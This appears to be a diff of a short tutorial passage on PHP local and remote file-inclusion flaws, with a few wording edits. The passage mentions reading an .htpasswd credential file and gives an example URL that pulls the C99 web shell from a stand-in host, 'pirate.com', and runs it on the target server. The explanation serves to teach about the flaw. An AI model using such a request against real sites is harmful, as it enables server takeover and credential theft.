 How does it work?

 This is where the problem occurs.
 The developer decided to put the real file name in the variable and since there are no checks done, it is possible to access any file the webserver has access to or any file on the internet.
-For example, if there is an .htpasswd in
+For example, if there is a

 /var/security/.htpasswd, we just have to load the page

-The second thing that could be done is calling some scripts on the internet.
+The second thing that could be done is to call some scripts on the internet.
 An attacker could for example load a shell (like the famous C99) on the server and do whatever he wants.
 He would just have to call the page

 www.mywebsite.com/index.php?page=http://pirate.com/c99.php and c99.php will be executed.